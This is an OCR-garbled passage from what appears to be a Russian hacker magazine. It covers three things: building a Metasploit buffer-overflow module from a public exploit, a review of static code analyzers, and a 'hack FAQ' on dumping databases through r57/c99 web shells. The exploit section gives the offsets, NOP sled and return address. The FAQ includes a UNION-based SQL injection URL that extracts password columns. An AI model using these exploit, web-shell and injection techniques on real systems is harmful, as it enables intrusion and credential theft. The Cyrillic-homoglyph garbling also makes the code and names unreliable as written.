рот, ведь большая часть работы уже сделана за 
тебя. Взять хотя бы огромную базу шелл-кодов 

— попробуй разработать свой. Но лени челове- 
ческой нет предела, поэтому в стремлении еще 
больше упростить процесс был разработан 
пакет утилит М5Р еХрІоіІ Виіісіег. Программа 
имеет удобный графический интерфейс и 
поможет по-настоящему быстро создавать 



новый модуль для Меіазріоіі. Кроме удобного 
ЭІІІ, еХрІоіі Виіісіег включает в себя целую кучу 
полезных тулз, необходимых для отладки и 
тестирования эксплоитов. Более того — можно 
опять же не создавать с нуля, а портировать 
уже существующие сплоиты. 

Предлагаю взять какой-нибудь эксплоит и с 
помощью М5Р еХрІоіІ Виіісіег превратить его в 
Меіазріоіі-модуль. Ты спросишь, зачем это нам 
надо? Превратив его в Меіазріоіі-модуль, мы 
можем использовать его вместе с различными 
рауіоасі-ами. Проще говоря, это сделает экс- 
плоит более универсальным и кроссплатфор- 
менным. Сейчас ты сам убедишься, насколько 
эта программа может упростить жизнь — ведь 
теперь для написания и отладки эксплоита не 
нужно даже знание ВиЬу и Меіазріоіі АРІ. В 
качестве кролика для эксперимента я выбрал 
первое, что попалось, — сплоит для ІІІрбѵѵіп 
0.42 ( тіІѵуОгт.сот/ехрІоіІз/7452 ). 

Запускаем М5Р еХрІоіІ Виіісіег, заходим в меню 
«Есіііог» и выбираем «ІЧеѵѵ». Появляется окно с 
несколькими вкладками (Іпіогтаііоп, Вабсбагз, 
Апаіузіз, Збеіісосіе, Оезідп). Переходим на вклад- 
ку «Іпіогтабоп» и видим много интересных 
полей. Как ты помнишь, в этой секции указыва- 
ются цели (05 + 5Р) и тип/протокол эксплоита 
(например, гетоіе/іср). Более того, программа 
предоставляет нам возможность тестирования 
и отладки полученного эксплоита, поэтому тут 
же можно выбрать исполняемый файл и указать 
параметры для его запуска (порт, ір-адрес). 

Итак, выбираем наш ІІІрсІ.ехе, после чего 
утилита предложит следующие действия на 
выбор: запустить приложение, запустить его 
под отладчиком или не запускать вообще 
— просто запустим приложение. Обрати вни- 
мание, что справа сбоку отобразится список 
загруженных приложением ООБ'ек. 

Теперь начинаем смотреть код сплоита — 
на наше счастье он предельно понятный. 



Комментарий «РезігісіесІ сбагз = 0x00 Охбе 
0x65 0x74» явно указывает на запрещенные 
символы — что ж, выставим их в нашей про- 
грамме. Для этого переходим на вкладку 
ВасісЬагз и в одноименном поле вводим: \х00\ 
х6е\х65\х74. Далее по коду мы видим, как фор- 
мируется ядовитый пакет: 

ту $раскек = ( ($р1) . ($порз1ес1) . 

( $зЪ.е11сос1е) . ( ($оѵегк1сж) ) . ($гек) . 

( $р2 ) ) ; 

Разбираемся с каждой составляющей и заодно 
составляем буфер для отправки во вклад- 
ке «Безідп». Сначала идет переменная $р1 
(ту $ р 1 =«\х0 0\х0 1 » ; ) . Вводим их в поле Ѵаіие 
(Орегабоп по умолчанию оставляем РАѴѴ]. За 
ней идет переменная $порзІесІ (ту $порзІесІ 
= «\х90» х 10;) — выбираем Орегабоп = ІЧОР 
и устанавливаем длину в 10. Далее распола- 
гается $зНеІІсосіе — устанавливаем Орегабоп 
= РАУ БОА Б и Бепдіб = 0. Следующая часть — 
$оѵегйоѵѵ (ту $оѵегйоѵѵ = "\х41 ” х $1еп; строка 
из символов «А» длиной в $1еп). Переменная 
ту $1еп = (274 — Іепдб~і($збеІІсосІе)), то есть 
строка длиной 274 символа минус длина шелл- 
кода. Выставляем Орегабоп = РАѴѴ, Бепдбі = 

274 и выбираем (нажимаем поочередно) вверху 
кнопки РАѴѴсоиІсІ Ье: гапсІ_ІехІ_аІрЬа, -рауіоасі. 
епсосіесі. ІепдІЬ, что означает: длина строки будет 
высчитываться по вышеприведенной формуле. 
Потом добавляем адрес возврата $геІ (ту $геІ 
= “\х5сІ\х10\х40”) и выбираем Орегабоп = РЕТ. 
Наконец, добавляем $р2, равное «\х00\х6е\ 
х65\х74\х6 1 \х73\х63\х69\х69\х00», и выбираем 
Орегабоп = РАѴѴ. Ядовитый пакет готов. 
Собственно, теперь у нас есть все для созда- 
ния готового сплоита. Поэтому нажимаем на 
кнопку «Оепегаіе» и любуемся кодом получив- 
шегося сплоита. Если какие-то моменты вызы- 
вают сомнения, тут же можно отредактировать 
код вручную. Классно, что возможно сразу 
проверить работоспособность кода — для 
этого смело жмем кнопку «Тезі». И ведь — все 
работает! За 5 минут, которые ушли на озна- 
комление с программой, и без всякого знания, 
как языка Рыбу, так и структуры Меіазріоіі, 
мы создали полностью рабочий сплоит. Это 
дорогого стоит! В качестве домашнего зада- 
ния попробуй с помощью М5Е еХрІоіІ Виіісіег 
создать эксплоит для нашего сервера :). 

ЗАКЛЮЧЕНИЕ 

Вот и закончилась наша экскурсия по фабрике 
эксплоитов. Знать, как устроены сплоиты, полез- 
но во многих отношениях. Не умея прочитать 
шелл-код в свежем эксплоите или, вообще, 
запуская непонятный ехе'шник, далеко не всегда 
можно доверять его создателю. Многие сплоиты 
выпускаются в паблик с отсутствующими частями 
и специально оставленными ошибками — это 
непременно остановит армию скрипткидис, 
но для понимающего человека едва ли станет 
серьезной задачей. Надеюсь, я сегодня убедил 
тебя, что ничего нереального в сплоитах нет: 
ведь хакеры люди — логичные и понятные :). т 
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ЛУЧШИЕ ИНСТРУМЕНТЫ ПЕНТЕСТЕРА 
СТАТИЧЕСКИЙ АНАЛИЗ КОДА 



У каждого из команды =е — свои предпочтения по части софта и утилит для пентеста. Посовещавшись, 
мы выяснили: выбор так разнится, что можно составить настоящий джентльменский набор из проверен- 
ных программ. На том и решили. Чтобы не делать сборную солянку, весь список разбит на темы. Сегодня 
мы разберем статические анализаторы кода для поиска уязвимостей в приложениях, когда на руках — их 
исходники. 

іііиі^ні» , т ѵчю№ ; ^ашшжяішананхпг^дпіітт:]Еш.я 



Наличие исходных кодов программы суще- 
ственно упрощает поиск уязвимостей. Вместо 
того чтобы вслепую манипулировать различ- 
ными параметрами, которые передаются при- 
ложению, куда проще посмотреть в сорцах, 
каким образом она их обрабатывает. Скажем, 
если данные от пользователя передаются 
без проверок и преобразований, доходят до 
5СН_-запроса — имеем уязвимость типа 5СН_ 
іщесбоп. Если они добираются до вывода в 
НТМЬ-код — получаем классический Х55. От 
статического сканера требуется четко обна- 
руживать такие ситуации, но, к сожалению, 
выполнить это не всегда так просто, как 
кажется. 

Современные 
компиляторы 4 — 

Может показаться забавным, но одним из 
самых эффективных анализаторов кода 
являются сами компиляторы. Конечно, пред- 
назначены они совсем для другого, но в 
качестве бонуса каждый из них предлагает 
неплохой верификатор исходников, способ- 
ный обнаружить большое количество оши- 
бок. Почему же он не спасает? Изначально 
настройки такой верификации кода выстав- 
лены достаточно лояльно: в результате, чтобы 
не смущать программиста, компилятор начи- 
нает ругаться только в случае самых серьез- 
ных косяков. А вот и зря — если поставить 
уровень предупреждений повыше, вполне 
реально откопать немало сомнительных мест 
в коде. Выглядит это примерно следующим 
образом. Скажем, в коде отсутствует провер- 
ка на длину строки перед копированием ее в 
буфер. Сканер находит функцию, копирующую 
строку (или ее фрагмент) в буфер фиксиро- 
ванного размера без предварительной про- 




РКЕРА5Т — КОГДА-ТО ОТДЕЛЬНОЕ 
ПРИЛОЖЕНИЕ, АТЕПЕРЬ ЧАСТЬ 
ѴІ51ІАІ_5ТІЮІ0 



верки ее длины. Он прослеживает траекто- 
рию передачи аргументов: от входных данных 
до уязвимой функции и смотрит: возможно 
ли подобрать такую длину строки, которая 
бы вызывала переполнение в уязвимой 
функции и не отсекалась бы предшествую- 
щими ей проверками. В случае если такой 
проверки нет, находим практически 100% 
переполнение буфера. Главная сложность в 
использовании для проверки компилятора — 
заставить его «проглотить» чужой код. Если 
ты хоть раз пытался скомпилировать прило- 
жение из исходников, то знаешь, насколько 
сложно удовлетворить все зависимости, 
особенно в больших проектах. Но результат 
стоит того! Тем более, помимо компилятора 
в мощные ЮЕ встроены и некоторые другие 
средства для анализа кода. К примеру, на 
следующий участок кода в Ѵізиаі Зіисііо будет 
выдано предупреждение об использовании 
в цикле функции _а11оса, что может быстро 
переполнить стек: 



сЬаг *Ь; 

(ІО { 

Ь = (сЪаг* ) _а11оса (9 ) 
} ѵітііе ( 1 ) 




і 



РЕЗУЛЬТАТ СКАНИРОВАНИЯ КАТ5 

В этом заслуга статического анализатора 
РРЕГазІ:. Подобно ЕхСор, предназначенной 
для анализа управляемого кода, РВЕІазІ: 
изначально распространялся в виде отдель- 
ной утилиты и лишь позже стал частью Ѵізиаі 
Зіисііо. 

ВАТ5 — КоидГі Аисііііпд 
Тооі *ог Бесигііу 

ѵѵѵѵѵѵ.зесигезоДѵѵаге.сот 
0ІЧІІ ОРІ 
ІІпіх, ѴѴІпсІоѵѵз 

Ошибка ошибке — рознь. Часть огрех, кото- 
рые допускают программисты, некритична и 
грозит только нестабильностью программы. 
Другие, напротив, позволяют инжектировать 
шелл-код и выполнять произвольные коман- 
ды на удаленном сервере. Особый риск в 
коде представляют команды, позволяющие 
выполнить Ьиііег оѵегЕоѵѵ и другие похожие 
типы атак. Таких команд очень много, в 
случае с С/С++ это функции для работы со 
строками (хзігсруО, зІгсаШ, деІз(], зргіпЩ), 
ргіпЩ], зпргіпЩ], зузІодО), системные 
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ФРОНТЕНД ДЛЯ ѴА5СА 



команды [ассеззО, сбоѵѵпО, сбдгрО, сбппосН], 
ІтрбІеП, ІтрпатП, Іетрпат(], ткІетрО), а 
также команды системных вызовов (ехес(] р 
зузіеппі), рорепО). Вручную исследовать весь 
код (особенно, если он состоит из несколь- 
ких тысяч строк] довольно утомительно. А 
значит, можно без труда проглядеть пере- 
дачу какой-нибудь функции непроверенных 
параметров. Значительно облегчить задачу 
могут специальные средства для аудита, в 
том числе, известная утилита РАТ5 (РоидЬ 
Аибіііпд Тооі бог 5еси гібу] от известной компа- 
нии Рогбібу. Она не только успешно справится 
с обработкой кода, написанного на С/С++, но 
сможет обработать еще и скрипты на Регі, 

РНР и Руібоп. В базе утилиты находится 
внушающая подборка с детальным описа- 
нием проблемных мест в коде. С помощью 
анализатора она обработает скормленный ей 
сорец и попытается выявить баги, после чего 
выдаст информацию о найденных недочетах. 
РАТ5 работает через командную строку, как 
под ѴѴіпсІоѵѵз, так и *піх-системами. 

С++, РНР, РуіЬоп, РиЬу 

► Ѵазса 

ѵѵѵѵѵѵ.уазса.огд 
Ореп Зоигсе 
Цпіх, ѴѴі псіоѵѵз 

Ѵазса также, как и РАТ5, не нуждается в 
установке, при этом имеет не только кон- 
сольный интерфейс, но и простенький ОШ. 
Разработчики рекомендуют запускать утилиту 
через консоль — мол, так возможностей 
больше. Забавно, что движок Ѵазса написан 
на РНР 5.2.5, причем интерпретатор (в самом 
урезанном варианте] лежит в одной из под- 
папок архива с программой. Вся программа 
логически состоит из фронтенда, набора 
сканирующих плагинов, генератора отчета и 
собственно движка, который заставляет все 

ПОТЕНЦИАЛЬНО ОПАСНЫЕ КОН- 
СТРУКЦИИ В ОТЧЕТЕ 6ВАІЮІТ ВЫ- 
ДЕЛЕНЫ КРАСНЫМ 




шестеренки вращаться вместе. Плагины сва- 
лены в директорию ріидіпз — туда же нужно 
устанавливать и дополнительные аддоны. 
Важный момент! Трое из стандартных пла- 
гинов, которые входят в состав Ѵазса, имеют 
неприятные зависимости. Ліпб, который 
сканирует Оаѵа’овские .сіазз-файлы, требу- 
ет наличия Діпі.ехе в директории гезоигсе/ 
ибіііу. Второй плагин — апбС, используемый 
для анализа сорцов Оаѵа и С/С++, требует 
апііс.ехе в той же директории. А для рабо- 
ты РМО, который обрабатывает Оаѵа-код, 
необходима установленная в системе Оаѵа 
5 Р Е 1.4 или выше. Проверить правильность 
установки можно, набрав команду «уазса ./ 
гезоигсезАезѴ». Как выглядит сканирование? 
Обработав скормленные программе сорцы, 
Ѵазса выдает результат в виде специального 
отчета. Например, один из стандартных пла- 
гинов ОПЕР позволяет с помощью паттернов, 
описанных в .дгер файлах, указать уязвимые 
конструкции и легко выявлять целый ряд 
уязвимостей. Набор таких паттернов уже 
включен в программу: для поиска слабого 
шифрования, авторизации по «пароль равен 
логину», возможных 50І_-инъекций и много 
чего еще. Когда же в отчете захочется уви- 
деть более детальную информацию, не поле- 
нись установить дополнительные плагины. 
Чего стоит одно то, что с их помощью можно 
дополнительно просканировать код на .ІМЕТ 
(ѴВ.ІЧЕТ, С#, А5Р.ІЧЕТ], РНР, СоШЕизіоп, 
СОВОЕ, НТМІ_, ОаѵаЗсгірІ, С55, Ѵізиаі Вазіс, 
А5Р, РуіЬоп, Регі. 

С++, Эаѵа, .МЕТ, А5Р, Регі, РНР, РуіЬоп и 
другие 

СррсЬеск 

сЬеск.ѵѵікі.зоигсеІогде. 

Ореп Зоигсе 
ІІпіх, ѴѴіпсІоѵѵз 

Разработчики СррсЬеск решили не разбра- 
сываться по мелочам, а потому отлавливают 
только строго определенные категории багов 
и только в коде на С++. Не жди, что програм- 
ма продублирует предупреждения компиля- 
тора — он обойдется без суфлера. Поэтому 
не поленись поставить для компилятора 
максимальный уровень предупреждений, а с 
помощью СррсЬеск проверь наличие утечек 
памяти, нарушений операций аііосаііоп- 
беаііосаііоп, различных переполнений буфе- 
ра, использования устаревших функций и 
многого другого. Важная деталь: разработчи- 
ки СррсЬеск постарались свести количество 
ложных срабатываний к минимуму. Поэтому, 
если прога фиксирует ошибку, можно с боль- 
шой вероятностью сказать: «Она действи- 
тельно есть!» Запустить анализ можно как 
из-под консоли, так и с помощью приятного 
ЭШ-интерфейса, написанного на 01 и рабо- 
тающего под любой платформой. 

С++ 





ОТ-ИНТЕРФЕЙС СРРСНЕСК 

дгаисШ 

ѵѵѵѵѵѵд и зіа п оіМ е гН а с ке г. 
соіл/ргоіесІз/дгаисІіІ.ЬіппІ 
Ореп Зоигсе 
ІІпіх, ѴѴіпсІоѵѵз 

Этот простой скрипт, совмещенный с набором 
сигнатур, позволяет найти ряд критических 
уязвимостей в коде, причем поиск осущест- 
вляется с помощью всем известной утилиты 
дгер. О ЭШ-интерфейсе тут неуместно даже 
упоминать: все осуществляется через кон- 
соль. Для запуска есть несколько ключей, но 
в самом простом случае достаточно указать в 
качестве параметра путь к исходникам: 

дгаисШ: /раСЬ/’Ьо/зсап 

Наградой за старание будет цветастый отчет о 
потенциально эксплуатируемых местах в коде. 




ХМЬ-ФОРМАТ ДЛЯ ОПИСАНИЯ 
СИГНАТУР В 5ѴѴААТ 



Надо сказать, что, помимо самого скрипта (а это 
всего 100 строчек кода на ВазЬ], ценность пред- 
ставляют сигнатурные базы, в которых собраны 
регекспы и названия потенциально уязвимых 
функций в разных языках. По умолчанию вклю- 
чены базы для РуіЬоп, Регі, РНР, С++ — можно 
взять файлы из папки зідпаіигез и использо- 
вать в своих собственных разработках. 

С++, РНР, РуіЬоп, Регі 

5ѴѴААТ 4 

ѵѵѵѵѵѵ.оѵѵазр.огд 
Ореп Зоигсе 
ІІпіх, ѴѴіпсІоѵѵз 

Если в дгаисііі для задания сигнатуры уяз- 
вимости используются текстовые файлы, то 
в 5ѴѴААТ — более прогрессивный подход 
с помощью ХМІ_-файлов. Вот так выглядит 
типичная сигнатура: 

ѵиіп шаСсЪ. — регулярное выражение 
для поиска; 
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ГРАФ ПОТОКА 
ДАННЫХ, ПО- 
СТРОЕННЫЙ 
РІХѴ 




РНР ВІІ65САЫЫЕР НАШЕЛ 5 ОПАСНЫХ 
МЕСТ В ОДНОМ РНР-ФАЙЛЕ 

Суре — указывает на тип уязвимости: 
зеѵегіСу — обозначает уровень риска (ІіідЬ, 
шебіиш или Іоѵѵ) 

аіб — альтернативный вариант кода для реше- 
ния проблемы 

5ѴѴААТ считывает базу сигнатур и с ее помощью пыта- 
ется найти проблемные участки кода в исходниках на 
баѵа, 65Р, А5Р .ІЧеІ: и РНР База постоянно пополняется 
и, помимо списка «опасных» функций, сюда включены 
типичные ошибки в использовании форматирования 
строк и составлении 506-запросов. Примечательно, что 
прога написана на С#, однако отлично работает и под 
никсами, благодаря проекту Мопо — открытой реализа- 
ции платформы .ІЧеЕ 
баѵа, Ч5Р, А5Р .Ие*, РНР 



> ѵѵагпіпд 

Информация пред- 
ставлена в целях 
ознакомления и, пре- 
жде всего, показы- 
вает, каким образом 
разработчики могут 
избежать критиче- 
ских ошибок во время 
разработки прило- 
жений. За исполь- 
зование полученных 
знаний в незаконных 
целях ни автор, ни 
редакция ответствен- 
ности не несут. 



> СІѴСІ 

Ищи на диске под- 
борку утилит для ста- 
тического анализа 



>,РНР Вид Бсаппег 

гагОг.пате/геІеазез/рЬр-Ьид- 

зсаппег 

Ргееѵѵаге 

ѴѴі псіоѵѵз 

Если тебе нужно провести статический анализ РНР- 
приложения, рекомендую попробовать РНР Вид Бсаппег, 
которую написал наш автор — гагОг. Работа проги основана 
на сканировании различных функций и переменных в РНР- 
скриптах, которые могут быть задействованы при проведении 
веб-атак. Описание всех ситуаций оформляется в виде так 
называемых пресетов, причем в программу уже включены 7 
специальных прессетов, сгруппированных по категориям: 

• собе ехесибоп; 



КЮСѴѴ0РКШ5І6НТУД0БН0 ИНТЕГРИРО- 
ВАН В СРЕДУ РАЗРАБОТКИ 



кода 
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АНАЛИЗИРУЕМ МѴА-ПРОЕКТ В ОІІЫСЕ 6 



• соттапб ехесибоп; 

• бігесіюгу Іхаѵегзаі; 

• діобаіз оѵегѵѵгііе; 

• іпсіисіе ; 

• ЗСИ-іщесбоп; 

• тізсеііапеоиз. 

Забавно, что прога написана на РНР/ѴѴіпВіпбег 
( ѵѵіпЬіпбег.огд ) и скомпилирована Ьатсотрііе [ ѵѵѵѵѵѵ. 
ЬатЬаІат.зе/ЬатсотріІе ). поэтому выглядит так же, как 
и обычное ѴѴіпбоѵѵз-приложение. Через удобный интер- 
фейс пентестер может включить или отключить анализ 
кода на наличие тех или иных уязвимостей. 

РНР 

Ріху 

эіхуЬох.зесІаЬ.Шѵѵіеп.ас.аІ: 

-гееѵѵаге 
ІІпіх, ѴѴіпсІоѵѵз 

В основе работы инструмента — сканирование исходно- 
го кода и построение графов потоков данных. По такому 
графу прослеживается путь данных, которые поступают 
извне программы — от пользователя, из базы данных, 
от какого-нибудь внешнего плагина и т.п. Таким образом 
строится список уязвимых точек (или входов) в приложе- 
ниях. С помощью паттернов, описывающих уязвимость, 

Ріху проверяет такие точки и позволяет определить Х55- и 
ЗОБ-уязвимости. Причем сами графы, которые строятся во 
время анализа, можно посмотреть в папке дгарбз (напри- 
мер, х55_б1е.рбр_1_бер.бо1:] — это очень полезно для 
того чтобы понять, почему именно тот или иной участок 
кода считается Ріху-уязвимым. Вообще, сама разработка 
крайне познавательна и демонстрирует, как работают 
продвинутые утилиты для статического анализа кода. На 
страничке документации ( ріхѵЬох.зесІаЬ.Іиѵѵіеп.ас.аі/ріхѵ/ 
боситепІабоп.рЬр ) разработчик доходчиво рассказывает 
о разных этапах работы программы, объясняет логику и 
алгоритм того, как должен анализироваться прогой тот или 
иной фрагмент кода. Сама программа написана на баѵа и 
распространяется в открытых исходниках, а на домашней 
страничке есть даже простенький онлайн-сервис для про- 
верки кода на Х55-уязвимости. 

РНР 

Оипсе 6 < 

ѵѵѵѵѵѵ.оипсеІаЬз.сот/ргосІисЩ 

ЗЬагеѵѵаге 

ѴѴіпсІоѵѵз 

Увы, существующие бесплатные решения пока на голову 
ниже, чем коммерческие аналоги. Достаточно изучить 
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Му и»«* 



ОТЧЕТ СОРЕ СРАѴѴЬЕР’АО СКАНИ- 
РОВАНИИ ИСХОДНИКА НАС# 



качество и детальность отчета, который состав- 
ляет Оипсе 6 — и понять, почему. В основе 
программы лежит специальный анализирую- 
щий движок Оипсе Соге, который проверяет 
код на соответствие правилам и политикам, 
составленным командой профессиональных 
пентестеров, аккумулировавших опыт извест- 
ных зесигііу-компаний, хакерского комьюнити, 
а также стандартов безопасности. Программа 
определяет самые разные уязвимости в коде: 
от переполнения буфера до 5СИ-инъекций. 

При желании Оипсе несложно интегрируется с 
популярными ЮЕ, чтобы реализовать автома- 
тическую проверку кода во время сборки каж- 
дого нового билда разрабатываемого прило- 
жения. Кстати говоря, компанию-разработчика 
— Оипсе І_аЬз — летом этого года приобрела 
сама I В М . Так что продукт, скорее всего, про- 
должит развитие уже как часть одного из ком- 
мерческих приложений ІВМ. 
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СОѴЕКІТѴ РРЕѴЕЫТ ЗА РАБОТОЙ 



Кіосѵѵогк ІпзідИІ 

ѵѵѵѵѵѵ. кіосѵѵо гк. со т 

ЗЬагеѵѵаге 

ѴѴІпсіоѵѵб 

Долгое время этот, опять же, коммерческий 
продукт реализовал статическое сканирование 
кода только для С, С+ и баѵа. Но как только 
вышли Ѵізиаі Зіибіо 2008 и .ІЧЕТ Егатеѵѵогк 
3.5, разработчики заявили о поддержке С#. 

Я прогнал программу на двух своих вспомо- 
гательных проектах, которые на скорую руку 
написал на «шарпе», и программа выявила 
7 критических уязвимостей. Хорошо, что они 
написаны исключительно для внутреннего 
использования :). Кіосѵѵогк ІпзідЫ изначально 
настроен, прежде всего, на работу в связке 
с интегрированными средами разработки. 
Интеграция с теми же Ѵізиаі Зіибіо или Есіірзе 
выполнена чрезвычайно удачно — начинаешь 
всерьез задумываться, что такая функцио- 
нальность должна быть реализована в них 
по умолчанию :]. Если не брать в расчет про- 
блемы с логикой работы приложения и про- 
блемы с быстродействием, то Кіосѵѵогк ІпзідЫ 
отлично справляется с поиском переполнения 
буфера, отсутствия фильтрации пользователь- 
ского кода, возможности ЗСИ/РаНУСгозз-зке 
инъекций, слабого шифрования и т.п. Еще 
одна интересная опция — построение дере- 
ва выполнения приложения, позволяющего 



быстро вникнуть в общий принцип работы 
приложения и отдельно проследить, например, 
за обработкой какого-либо пользовательского 
ввода. А для быстрого конструирования правил 
для проверки кода предлагается даже специ- 
альный инструмент — Кіосѵѵогк СЬескег Зіибіо. 
С++, баѵа, С# 

Соѵегііу Ргеѵепі Біаііс 
Апаіузіз 

ѵѵ ѵѵ ѵѵ. с о ѵе г і Щ . с о т /р го сі и с I з 

ЗЬагеѵѵаге 

ѴѴІпсІоѵѵз 

Один из самых известных статических ана- 
лизаторов кода на С/С++, баѵа и С#. Если 
верить его создателям, — решение исполь- 
зуется более чем 100.000 разработчиков 
по всему миру. Продуманные механизмы 
позволяют автоматизировать поиск утечек 
памяти, неотловленных исключений, проблем 
с быстродействием и, конечно же, уязви- 
мостей в безопасности. Продукт поддержи- 
вает разные платформы, компиляторы (дсс, 
Місгозоіі Ѵізиаі С++ и многие другие], а также 
интегрируется с различными средами раз- 
работки, прежде всего Есіірзе и Ѵізиаі Зіибіо. 
В основе обхода кода используются не тупые 
алгоритмы обхода от начала до конца, а что- 
то вроде отладчика, анализирующего, как 
программа поведет в себя в различных ситу- 
ациях после встречи ветвления. Таким обра- 
зом достигается 100% покрытие кода. Столь 
сложный подход потребовался, в том числе, 
чтобы всецело анализировать многопоточные 
приложения, специально оптимизированные 
для работы на многоядерных процессорах. 
Соѵегііу Іпіедгііу Сепіег позволяет находить 
такие ошибки, как состояние гонки (ошибка 
проектирования многозадачной системы, 
при которой работа системы зависит оттого, 



в каком порядке выполняются части кода], 
тупики и многое другое. Зачем это нужно 
реверсерам? Спроси об этом разработчиков 
Обау-сплоитов для Еігеіох и ІЕ :]. 

С++, баѵа, С# 

0ѴѴА5Р Согіе Сгаѵѵіег 

ѵѵѵѵѵѵ.оѵѵазр.ога 

6 ЫІІ 6 РІ_ <_ 

ѴѴІпсіоѵѵз 

Создатель этой тулзы Алессио Марциали 
— автор двух книжек по А5Р.ІЧЕТ, авто- 
ритетный кодер высоконагруженных при- 
ложений для финансового сектора, а также 
пентестер. В 2007 году он опубликовал 
информацию о критических уязвимостях в 
27 правительственных сайтах Италии. Его 
детище — 0ѴѴА5Р Собе Сгаѵѵіег — предна- 
значенное для статического анализа кода 
.ЫЕТ и 62ЕЕ/6АѴА, открыто доступно в инете, 
а в конце года автор обещается выпустить 
новую версию программы с намного большей 
функциональностью. Но самое-то главное 
реализовано уже сейчас — анализ исход- 
ников на С#, Ѵізиаі Вазіс и баѵа. Файлы для 
проверки выбираются через СШ-интерфейс, 
а сканирование запускается автоматически. 
Для каждого проблемного участка кода выво- 
дится описание уязвимости в разделе Тбгеаі 
Оезсгірііоп. Правда, поле 0ѴѴА5Р Сиібеііпез, 
вероятно, указывающее пути решения проб- 
лемы, увы, пока не доступно. Зато можно 
воспользоваться экспериментальной осо- 
бенностью сканирования кода на удален- 
ной машине, доступной во вкладке Ветоіе 
Зсап. Автор обещает серьезно прокачать эту 
возможность и, в том числе, агрегировать 
исходники приложения для анализа прямо из 
системы контроля версий, 
баѵа, С#, ѴВ =н= 
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взлом 



■ ■ _І0КЕ5ТЕР РОПІІМ.АІМТІСНАТ.РІІ 

■ ■ ТѴѴ05ТЕК АЫТІСІѴѴЕРТѴгабМАІІ_.С0М, ТѴѴ05Т.РЦ 



Е-Э2Ц 

Н-эск 



Еагц 

Наск 



Еагц 

Наск 






ЗАДАЧА: СДАМ ПИТЬ БАЗУ ДАННЫХ ПРИ 
НАЛИЧИИ ВЕБ-ШЕЛЛА 



РЕШЕНИЕ: 



I. Для начала нужно отыскать конфиг с аккаунтом подключения к базе. Он 
может находиться как в файлах конфигов и выглядеть примерно так: 



$соп^ід [ ' зегѵег ' ] = 1 ІосаІЬозД 1 ; 
$соп:Еід [ ' рогД 1 ] = 3306; 

$сопіід [ 1 изег 1 ] = 1 ѵаза'; 

$сопіід [ 1 раззѵгогсі 1 ] = ’руркіп'; 
$сопіід [ 1 сІЬ 1 ] = ' ѵаза_руркіп 1 ; 



Либо непосредственно в файле, который работаете базой, и выглядеть, напри- 
мер, так: 



тузд1_соппесД ( " ІосаІТюзД" , "ѵаза" , "руркіп" ) ; 
тузд1_зе1есД_с1Ъ ( " ѵаза_руркіп" ) ; 



II. Сдампить базу можно непосредственно с шелла (во всех популярных шел- 
лах есть опции подключения к базе и возможность сделать дамп], либо — 
залив на сайт сторонний дампер, либо непосредственно из командной строки. 
Рассмотрим все эти варианты. Вариант с шеллом самый простой и, каза- 
лось бы, удобный. Но это не всегда так. 

В г57, например, очень неудобно реализована работа с базой вообще, хотя 
для небольших баз, которые нужно сдампить целиком, сгодится и он. Воттебе 



ХАКЕРСКИЕ 

СЕКРЕТЫ 

ПРОСТЫХ 

ВЕЩЕЙ 



пошаговое руководство к действию (только для ознакомления, естест- 
венно): 

1. В г57 снизу присутствует вкладка «ОаІаЬазез», в которой есть опция Рип 
506 риегу, находим ее. 

2 . Вбиваем аккаунт на базу, ставим галку «5аѵе битр іп Ше» и вводим назва- 
ние файла дампа (по умолчанию битр.зрі] 

3. Жмем кнопку битр. 

3. Лицезреем сохраненный файл в рабочей директории в несжатом виде. 

В с99 работа с базой реализована лучше и сводится к следующему алгоритму. 

1. Жмем сверху на вкладку 501. 

2 . Вбиваем форму подключения и жмем «соппесі». Слева появляется выпадаю- 
щее меню, где можно выбрать базу или даже отдельную таблицу (или несколь- 
ко таблиц], которую нужно сдампить. Это удобно, если вся база не нужна. 

3. После выбора таблицы появляется интуитивно понятный диалог, в котором 
можно выбрать путь и название дампа, жмем «битр» и видим несжатый файл 
«.врі» там, куда мы его положили. 

Все это хорошо и удобно, но существуют некоторые проблемы. 

1. Файлы после дампов необходимо сжимать, ибо качать несжатые базы быва- 
ет очень сложно. 

2 . Если база большая, то через шелл ее сдампить не удастся (он просто не 
справится и соединение отпадет по таймауту]. 

При наличии этих проблем переходим кплану«Б» — обращаемся за помо- 
щью к альтернативным дамп ерам или к консольному тузрібитр. Дам перов 
существует великое множество, но отметить хотелось бы 2 самых популярных 
— «Му5СИ Р5Т/0НС Мападег» и «Зурех йиппрег Ыіе». Думаю, с возможностя- 
ми и реализации дампинга через этотсофтты разберешься самостоятельно. 



№2 



ЗАДАЧА: СДЕЛАТЬ ВЫБОР НУЖНЫХ 
ЗНАЧЕНИЙ, С ОПРЕДЕЛЕННЫМ СЛОВОМ 
В ИМЕНИ СТОЛБЦА ИЛИ ТАБЛИЦЫ ПРИ 
ЯВНОЙ 50ЫШЕСТЮЫ 



РЕШЕНИЕ: 

В этом нам помогут несколько операторов МуЗСИ, а именно: ЫКЕ, І\І0Т 6ІКЕ и 
РЕОЕХР. Разберем подробнее. 

1. ЫКЕ. 

Оператор Е\КЕ проверяет, соответствуетли возвращаемое значение заданому 
образцу. Например: 



Структура досту п н ых баз да н н ых 

--ОаЦаЪазе зікеі 

ДаЫе пемз 

соііишп ІО 

соііишп пемз 

ДаЫе изегз 

соііишп Іодіп 

соііишп раззмогсі 

--ОакаЬазе зіДе2 

ДаЫе агДісІез 

соііишп ІО 

соііишп агДісІе 

ДаЫе изег 

соііишп изегпаше 



соііишп изег_раззѵт0 

Теперь представим, что перед нами стоитзадача выбрать все базы, таблицы, 
которые содержат столбцы с именем ‘*ра55*’. Делаем такой запрос: 

зеіеск дгоир_сопсак (сопсак_мз ( 0x3 А, каЫе_зсЬеша , ІаЫе_ 
паше , со1игап_паше) ) ігош іпіогтакіоп_зс1оета . соіишпз 
ѵОіеге со1итп_пате 1іке+ ' %разз% ' 

Или на примере инъекции с выводом в поле №2: 

ЪЩЦр : //зіке . сош/зсгірк . ркр?і0=-1+ипіоп+зе1еск+1 , дгоир_ 
сопсак (сопсаД_ѵ^з ( 0x3 А, ДаЫе_зсЬета , ДаЫе_паше , со1итп_ 
пате) ) , 3 + ігот+іпіогтаЦіоп_зскета . со1итпз+ѵ0іеге+со1итп_ 
пате+1іке+ * %разз% ' -- + 



Вывод будет следующий: 

зікеі :изегз граззѵгогО, зіке2 : изег : изег_раззм0 

Разберемся с образцом %раз5% — % (процент) указываетсовпадение с любыми 
символами, под этотобразецпопадаютвеезначения, в которых присутствует 
частица ‘разз’ независимо отее положения в значении. 

2 . N01 ИКЕ. 

